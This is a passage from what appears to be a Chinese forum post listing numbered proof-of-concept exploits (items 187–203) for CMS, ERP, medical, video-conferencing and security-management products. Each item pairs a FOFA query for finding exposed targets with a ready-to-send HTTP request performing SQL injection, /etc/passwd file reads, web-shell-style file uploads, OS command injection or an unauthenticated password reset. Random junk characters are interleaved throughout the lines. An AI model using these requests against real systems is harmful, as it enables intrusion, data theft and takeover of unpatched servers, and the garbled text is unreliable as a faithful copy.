Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
- V4 i9 y7 O* C' w6 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 J, o! |3 b8 ?' Q3 @/ U* g9 W
Accept-Encoding: gzip, deflate8 c; q7 {. t6 R" `) m" {8 Y
Connection: close/ k4 c- o1 @: t/ R7 w3 s, {
Content-Type: application/x-www-form-urlencoded" A/ G9 _9 p: ?$ O; M r+ t
. S. Q# `$ ^3 @0 L3 B# `. M
req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450 w, W$ A2 i2 H
+ s$ c- K8 C% H [% H6 R) u4 O5 z
187. Mura CMS processAsyncObject SQL注入- G" a* n$ a; k3 b
CVE-2024-326401 k0 h, b: ]! |5 l: Z4 f! T1 |
FOFA:"Mura CMS": F- \ a5 S& x8 i c
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
: ?0 N; d; z" SHost: your-ip7 q" D% j, A% X. y
Content-Type: application/x-www-form-urlencoded' S0 n& I4 U% \
0 C% e2 C( o) S1 N- k' }% {0 r1 l& x7 Q5 x# X, s) g$ r, n
object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=11 S' [. J' c: X9 v# d0 d
, f. _1 A# C V2 k( N3 s% o6 G7 R8 ], [- ^
188. 叁体-佳会视频会议 attachment 任意文件读取
$ X: ~; x% Q9 @/ s3 A1 f+ b/ Rversion <= 3.9.7; b) V+ H6 z" I) m6 s+ `
FOFA:body="/system/get_rtc_user_defined_info?site_id"
# l p) g' x* p. k& xGET /attachment?file=/etc/passwd HTTP/1.18 ~- l% h1 e) y$ R
Host: your-ip% c% h" ^0 K! S' j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
6 U2 t) o; y* a N* a, ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7, x! l4 m4 i3 r
Accept-Encoding: gzip, deflate1 {7 Z1 y3 w8 M1 S2 J5 `
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
! H! I/ P2 c! l" mConnection: close+ j$ D: J& P1 q* O3 p! m* G
4 m+ Q4 A4 J6 x5 O* X5 {
8 f7 `7 e L; O3 i+ A0 P
189. 蓝网科技临床浏览系统 deleteStudy SQL注入4 [9 H% z6 {/ u
FOFA:app="LANWON-临床浏览系统"4 A6 p! x3 J3 I3 U/ _ d
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
6 e- n$ n' S9 S! `- |+ K) U: Y+ ?+ l% xHost: your-ip
& I( k# d p7 z) o9 I" k' VUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
# @9 M- S9 \ @Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# R+ X8 d% t' k5 }0 E7 k3 A8 W2 gAccept-Encoding: gzip, deflate
0 P% v# s' D1 R) |: b# Y6 AAccept-Language: zh-CN,zh;q=0.96 O. R$ k5 Z3 p" c
Connection: close# @/ L/ m( c+ J/ y h, c
/ a9 C; f7 ?2 F
1 p7 ~* A, M/ c* a" N5 @; |190. 短视频矩阵营销系统 poihuoqu 任意文件读取- o% C: n9 ]- j$ D5 {
FOFA:title=="短视频矩阵营销系统"' d1 Q9 r! g$ K9 m l( T
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
& L4 d: a3 U `+ uHost: your-ip( |; ~. P$ y2 p# e$ ?2 f$ J# T' @5 H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
. y! Y( p% F2 d! |& o5 e0 mAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.97 t0 S5 l3 g% T* F) D; W+ t" u
Content-Type: application/x-www-form-urlencoded
2 \. P7 A' J! W3 zAccept-Encoding: gzip, deflate& _# H8 ^ ^# u
Accept-Language: zh-CN,zh;q=0.9
( R. V* p% ^$ z' d
0 }. W& {& r5 M4 i8 Kpoi=file:///etc/passwd) W$ I9 _) g5 j- i+ B0 `8 s
U8 Q$ t* g5 G/ ]4 s3 g0 T+ c* l" {
" X; ]8 z* b5 W. t9 Z0 O4 |191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入- U- `$ U) F. y; ^' x# u( ^3 N! a
FOFA:body="/CDGServer3/index.jsp"5 n! Z% o- D0 J6 p% M
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
! k0 T/ w6 R2 Y. GHost: your-ip
/ e7 o/ V6 ?# X5 o3 l3 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
% Y9 `& s3 \* SContent-Type: application/x-www-form-urlencoded
& `; }5 t6 Q4 Y9 D' l, i7 x8 V) a4 d: C4 w; b! k, |6 v- i% X' D
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
0 k s9 B$ N6 o7 x2 B" n% r) E+ ^) f8 z+ O1 I) P
! d& ?8 F1 @" ]/ c1 {, l192. 富通天下外贸ERP UploadEmailAttr 任意文件上传$ _: T1 ?# Q5 t; ^5 q, T$ Z
FOFA:title="用户登录_富通天下外贸ERP"
# }( N# t9 n2 r8 P2 @POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
. b+ p: b( m, N+ k2 G3 _2 vHost: your-ip
2 u" [4 {/ p' ]% Z' [1 o6 Y9 b: \User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.363 l G2 P7 f0 u- ^
Content-Type: application/x-www-form-urlencoded, `$ T2 \1 n' p
5 U7 r* H4 A0 c3 H; y
9 q9 S2 n- l7 l$ @+ @<% @ webhandler language="C#" class="AverageHandler" %>
& s0 ~3 ]2 J5 W7 p4 r* Nusing System;% @: a: D4 ]1 f- e2 I5 R7 V
using System.Web;
4 O& V# g% d: g7 I6 B, Apublic class AverageHandler : IHttpHandler
4 Z! F: q9 }, R. ^: |; I{
* t, u' A0 T" ?public bool IsReusable! F) [% s/ D$ S/ B* t. C5 j
{ get { return true; } }) R O3 G* d# J
public void ProcessRequest(HttpContext ctx)
4 ^; U5 B' p. T- E% S% A H{
' }7 U& x3 \' V$ Uctx.Response.Write("test");
+ J4 J* Z* [* l$ i- x. A% X6 p}$ i# ^, ~$ g1 b) l5 V* I
}
3 B9 j3 `6 }8 R- Z9 b4 {) Z, s, x* w" [
- e, r/ n' [" }4 n) a193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
, H) g( Q2 V5 E, _* gFOFA:body="山石云鉴主机安全管理系统"6 c, s! r) i; A( i' q- I
GET /master/ajaxActions/getTokenAction.php HTTP/1.1) ~ W2 s0 ~! k/ N' M( e0 r
Host:
3 n+ z' e0 K7 F: I/ P; JCookie: PHPSESSID=2333333333333;0 {% }; F, T5 L5 o! Z
Content-Type: application/x-www-form-urlencoded
- i0 K" p+ e6 WUser-Agent: Mozilla/5.07 o% E5 G2 C% h
9 H( j" l+ A4 v' v( Y, p
8 Z# E' \5 V O$ s# h& `! KPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1: `8 U: u+ h& l: u% j; F) q
Host:
5 F: r: D$ d$ M- n8 ]/ WUser-Agent: Mozilla/5.0
6 r, n, V+ l5 r4 T3 B" Y$ S: s' eAccept-Encoding: gzip, deflate3 Z6 A' h9 j9 \: F* R
Accept: */*( n# P; d$ y- n5 ~- `
Connection: close+ }6 q/ b+ Z7 g4 {: ]
Cookie: PHPSESSID=2333333333333;
! K" _/ B! y2 h4 T6 g9 } ^/ s6 WContent-Type: application/x-www-form-urlencoded
1 A+ }+ [" q, r* T1 [) H! XContent-Length: 84$ y& Y2 M$ p4 X2 G7 I2 g+ R
. ]" j& U e5 @3 I o
param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config'). q8 R! M$ j# R
/ C6 y: G R: L4 I
6 h* P& A! z$ eGET /master/img/config HTTP/1.1
; _/ B$ i2 g8 B0 o4 j" P# `Host:
7 M7 r Z- v$ ~User-Agent: Mozilla/5.05 z" l& a+ I% P; Y0 M
& G' X/ Q2 y" t1 a7 o$ z z- g+ C
0 ?: Z' n0 G5 T0 j/ c* O2 r
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
( U/ f; W* w& B7 W1 t9 Y# M3 z8 yFOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在
' g2 z. x- }8 P
6 c# K# g0 ^+ xPOST /servlet/uploadAttachmentServlet HTTP/1.1* T+ |7 }4 q! z7 f8 @* F
Host: host2 E$ m! S2 i; ~) ~% \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
! E4 Q- i7 x7 g1 M7 |3 MAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 Z4 ~ \3 w- J7 F) s4 Y$ f" eAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
* B: m4 Q# F) h- H$ E/ Y" }# x& \( P/ n/ Z! [Accept-Encoding: gzip, deflate J6 r( G7 f/ `2 ^
Connection: close# n8 u, k; S: m* B2 `; e9 e' g
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
* {( q! F6 {* O: X# q1 g------WebKitFormBoundaryKNt0t4vBe8cX9rZk
]3 t6 U8 t' ?8 K- ^- _& z5 U7 m/ N/ a! h
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"* u6 G8 [5 F) V# a# n4 X' L8 }
Content-Type: text/plain8 ?( c% y y" f# \' O
<% out.println("hello");%>
0 [3 I7 e, ~$ w; X, K------WebKitFormBoundaryKNt0t4vBe8cX9rZk
2 g9 C0 m! U4 I6 T$ k4 I1 {1 AContent-Disposition: form-data; name="json"4 m! l& L; L2 \
{"iq":{"query":{"UpdateType":"mail"}}}, A1 b9 Q$ E3 t9 b+ Y0 N
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--+ w5 a- ^1 |) g( L
3 v: i6 Z2 z8 m& f' D: c5 U
" ~+ l7 S) g- ~6 M195. 飞鱼星上网行为管理系统 send_order.cgi命令执行7 L7 d% s. C3 L4 {
FOFA:title=="飞鱼星企业级智能上网行为管理系统" A# X: ]% d1 f- e
POST /send_order.cgi?parameter=operation HTTP/1.1' R: ^2 g4 F0 x+ @' U+ {, k
Host: 127.0.0.18 Q$ }# w$ c6 f4 J" i) Q
Pragma: no-cache' Q' ?3 L! ]- K$ m i7 T, S
Cache-Control: no-cache- g. \2 W: h T4 X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36$ X. S* y, ]: `" Z8 Q
Accept: */*6 X5 v ?# U* {, s& h. p" c' P, N
Accept-Encoding: gzip, deflate
; h: c- C4 L3 w; |7 RAccept-Language: zh-CN,zh;q=0.9 ?1 B% m+ `0 N# @( i7 u
Connection: close7 p0 y! }) @3 M1 d
Content-Type: application/x-www-form-urlencoded9 A' H4 n& }5 e9 [
Content-Length: 68
6 E. v' D$ W" N1 X0 m! h# Y" N. T" H8 m$ @ q2 v$ ]# K- r
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}' G$ C7 a1 y4 y$ T; D/ i. G
' x& J& [% O) r. F% C
/ |* z) O" M. j& D, |" b196. 河南省风速科技统一认证平台密码重置
- G! a- R/ ~& P% d9 `* \3 `* s2 zFOFA:body="/cas/themes/zbvc/js/jquery.min.js"
2 q- }& G- h* [POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
5 t3 b1 m) i& V7 K: t4 b' \ c: m; VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
- B6 D5 b2 b. F) D6 TContent-Type: application/json;charset=UTF-8: M, L0 b# O5 C$ ^
X-Requested-With: XMLHttpRequest
! e0 E; s3 \* xHost:
3 K. @! X# ]1 {Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2- I- x7 A: x/ j8 V, M' `; j
Content-Length: 45" l& q; E1 D* E4 A* E9 K
Connection: close
: L! N5 p3 C0 D* ~3 f
% [7 d; L; g/ Y, q7 T4 M{"xgh":"test","newPass":"test666","email":""}' A0 t7 q: |1 u/ D3 o# _
5 v# R0 K1 @+ _# S8 D7 q7 ?3 w3 U, U1 y* c
% z9 D7 `; e0 x9 O8 `: m" m197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
" f" ?8 w2 C4 Z4 l0 ^+ w4 r/ W8 e! eFOFA:app="浙大恩特客户资源管理系统"/ i0 [+ n; C% ], n- O/ k: r9 {
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
- ]: ^& z. H& T8 [6 SHost:
- T. C4 p9 K- M4 PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36' c+ f* V# }& M; b& r
Accept-Encoding: gzip, deflate2 ]2 B7 F% W* D: T9 h
Connection: close8 X8 E! s& ~3 |) E, ?
( E# Q. u" e, c+ z3 d m
; b/ H% L# D$ D3 |( C" @) x! Y4 O9 L" O o
198. 阿里云盘 WebDAV 命令注入
% Z( B8 q& R- FCVE-2024-29640
6 R1 }- D9 z; f5 uGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1( d- z5 I: u( ~7 R
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf646 C% t& |4 B; W8 u; o" ^" | {
Accept: */*7 U! r( ^- {! K/ U" E$ h; W
Accept-Encoding: gzip, deflate
. o Z. E- i% P* Y% ?Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
1 M5 s' r) d0 f. U9 p* QConnection: close
1 i9 [& k' O# ~) F8 F5 U
7 S/ A% z9 ]/ @* g/ s+ c8 z* l/ e' e/ h, D1 E; E1 Q
199. cockpit系统assetsmanager_upload接口 文件上传
; f) v9 O A( g, ?: f5 W* h- w4 Q: z! E. j
1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
# Z8 S6 [- A9 K* X1 h- n2 JGET /auth/login?to=/ HTTP/1.1
, k/ W E# l! p' ^7 m p5 H
- v9 O) Z; D% s8 T+ f7 D响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"& \( t5 |4 v, M. e- F( I1 V o u
2 n. [) k" q6 ^1 X! M5 Q2.使用刚才上一步获取到的jwt获取cookie:9 x- F- V/ S/ A( t( O" l
; G6 ]0 h2 x, p, p- T; Y2 `
POST /auth/check HTTP/1.1! b! d* i3 T$ }9 F% {9 V
Content-Type: application/json* ~9 C5 z7 j% f9 O4 k3 P
; J+ r6 F) y5 o$ C. f- E{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}
c1 W. a1 B/ Z
" m7 `" |0 w6 [ G# {响应:200,返回值:( i6 n6 ^1 b4 a* z- Z# C: K% `
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/7 |3 A6 H: n3 V+ K+ |& s Z
Fofa:title="Authenticate Please!"3 v; n/ z$ c6 E! P: e, h2 ?
POST /assetsmanager/upload HTTP/1.19 J8 P6 j5 R4 A% X- u- S, ~
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb33 t2 D$ ~5 N# P6 L$ U% u5 O
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92% s4 Q5 `: ]$ f6 c# y' K
& V5 O2 A% T' ?. m) @; _2 p4 B
-----------------------------36D28FBc36bd6feE7Fb3% E: g; g$ P6 f: \6 l! B# S
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
( C. f6 L+ A/ d: t" k8 zContent-Type: text/php$ S5 I& m8 Z7 ~7 H: A
P/ m& e% u' Y# e5 b& Y0 |) @
<?php echo "tttt";unlink(__FILE__);?>
7 u" B( }1 D0 Z1 q* T7 b% K* d% v, l-----------------------------36D28FBc36bd6feE7Fb3
! p0 f+ n* k5 g3 wContent-Disposition: form-data; name="folder"; Q+ x5 L: [' \
9 D" x5 a/ f0 b
-----------------------------36D28FBc36bd6feE7Fb3--
4 \8 K) r2 H) r3 R! F" v6 r7 y( ?3 Q: Y! f$ Y. X0 l
/ s- C8 N% ~# X' n1 N
/storage/uploads/tttt.php
. X- I) ?: q1 Z; U
5 h, L! y4 ]9 W' v& q, y7 l200. SeaCMS海洋影视管理系统dmku SQL注入
A0 S/ z# g& i; x$ XFOFA:app="海洋CMS"
# V+ v! T+ Z& Q3 C. zGET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.13 E& v# A" h$ C$ G- S
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
" X2 H! I7 P# u# l( S( |* }2 BUpgrade-Insecure-Requests: 10 B2 S* ^- S q s# e# O
Cache-Control: max-age=0
8 y2 u( q! _8 m: K, ^Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.70 N, ]! z4 x5 i F
Accept-Encoding: gzip, deflate
# k, [4 y$ k+ }Accept-Language: zh-CN,zh;q=0.9
! T z& v8 W( R6 b4 h" u6 V k; S/ ], e) z5 v( f) g1 l9 ] H
8 U, f- Q3 Y3 Q+ E8 n' }201. 方正全媒体新闻采编系统 binary SQL注入
8 A, Y. G; z8 x( ?( Q. K2 jFOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
/ X% s8 m7 U/ w/ r" q' M6 T, ZPOST /newsedit/newsplan/task/binary.do HTTP/1.1
% }, t; I9 N6 H. zContent-Type: application/x-www-form-urlencoded
3 y" G# U7 S( }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
G0 X( Q# _1 i$ r* e% EAccept-Encoding: gzip, deflate; ^9 k6 Y1 N- ?+ r2 X3 ]
Accept-Language: zh-CN,zh;q=0.9
0 E5 r, G( N; {/ |Connection: close
5 X6 Y# `9 ]' p. w+ y" S
; C) y0 i1 S# j9 Q3 zTableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=14 P/ r1 R4 Z% |6 o
J1 U* A+ q p+ i/ M) G0 W
, n# ?2 B3 _: q' C# T202. 微擎系统 AccountEdit任意文件上传4 [$ ` S! _6 x
FOFA:body="/Widgets/WidgetCollection/"2 m& Z+ H5 q2 Y3 F# I+ x4 W
获取__VIEWSTATE和__EVENTVALIDATION值
) A( \# U6 a8 I9 C3 U& @+ o mGET /User/AccountEdit.aspx HTTP/1.1
6 X' k$ Y* G9 l+ ?$ w# a. ~Host: 滑板人之家+ F/ u# x1 V. U2 V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
/ k! h/ J1 `$ y+ \ D5 mContent-Length: 0& C9 E3 m4 i* S! z1 K5 _
/ w" C: G$ ]4 s- R: w
& ^8 g1 A( @) n6 W7 d替换__VIEWSTATE和__EVENTVALIDATION值
3 S5 C+ _) W1 j; U3 T# v4 @POST /User/AccountEdit.aspx HTTP/1.1. l, X5 |( l. e; t8 Y
Accept-Encoding: gzip, deflate, br7 h( j. \: p& \6 r; r( d3 y; x) m
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
1 N: \) z* _7 q- X# s4 w
9 O S, n3 V4 k& x: Y1 D$ B1 Z-----------------------------786435874t385875938657365873465673587356879 Z2 m7 z7 o5 }& u9 y/ |: s
Content-Disposition: form-data; name="__VIEWSTATE"
0 }) }8 L0 t! e3 r( i4 T+ Y9 N; W& |/ L% \ U- F5 G: ^* h1 ^
__VIEWSTATE
. [/ ?6 r0 Q( Q7 h2 Z-----------------------------786435874t385875938657365873465673587356874 f" p# v1 J: b' l' i* `: d
Content-Disposition: form-data; name="__EVENTVALIDATION"2 z0 K, X# e4 w u0 |) j
( `2 o, r e8 w3 p: e4 F__EVENTVALIDATION
* K7 j, i* y0 J: f4 h8 }" M-----------------------------786435874t38587593865736587346567358735687! v5 ` `+ e, ~1 q
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"' K& d E3 V& G4 V4 v
Content-Type: text/plain
/ _8 V' Q* X, |+ I9 F' L( G' N' Z' X' M Y- |, p/ P
Hello World!# E( @7 m+ [: I
-----------------------------786435874t385875938657365873465673587356871 T$ j/ ~3 r! D: U' g7 }1 d% u9 I
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
" X6 m) p) m; ~, J9 B. ?+ z/ S" t" j$ { Z8 j1 U
上传图片7 z# T7 ^4 b3 m7 `% L& I
-----------------------------786435874t385875938657365873465673587356870 G6 C. D4 M9 o3 K' M: V
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"& _7 \0 X0 s# I+ @; U' |, ~0 H
# A1 B- k2 c0 b# t8 G X
8 c% d, ]' L4 n$ p
-----------------------------786435874t385875938657365873465673587356875 Q" }6 b0 c( z8 S. I% i
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"1 `2 m- l" q3 W) z
" }3 D% L; |3 h- m; W
& @* b6 B# c5 z: {& Q' ^, n-----------------------------786435874t38587593865736587346567358735687--1 L8 t K6 H2 A i) w4 r/ d
/ V9 \- m t9 r( x( N2 O5 c
- \ h# n. }5 z8 X0 \3 C/_data/Uploads/1123.txt: l; @$ T3 W1 d: Q
. J# i) [ {' |: q6 K6 ?
203. 红海云EHR PtFjk 文件上传
/ j/ Q) K4 O& c# ? r- [) y$ d" y5 dFOFA:body="RedseaPlatform". ]5 s- Z2 {4 F
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
O4 |. q8 S$ V' h) lHost: x.x.x.x" X8 B$ {8 W) J
Accept-Encoding: gzip" `) h/ [9 {1 ?( f8 M9 ]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 `3 K' O+ `' I0 z4 P3 U
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
! p: ^2 F: P' k1 t0 ~Content-Length: 210
f* V' u) B0 e4 O2 _ }; {( ~
) g! B% k* b b------WebKitFormBoundaryt7WbDl1tXogoZys4
4 N! r- V& c( B0 s, K( `Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
8 y. r) W% W. \Content-Type:image/jpeg
* }$ d" ]: w- ^1 E0 p; | x' |0 g1 R$ k7 s4 F. F1 p- F
<% out.print("hello,eHR");%>
1 W# B: ^8 h( i5 D' p------WebKitFormBoundaryt7WbDl1tXogoZys4--4 T2 [, D+ |3 ^, z% f3 D) G. Y
+ C0 u L1 T* ] 7 C2 I" b* M; M
, y0 ]4 j V' C4 Q) e- x/ P" S
+ ^: c3 z% `! S7 X1 u, ` h* ?8 D
$ G3 o& p9 Q# ^) c7 J+ V8 D# L" ?
+ \) i+ L% O# N# ^9 W |
发表于 2024-6-5 14:31:29
收藏
支持
反对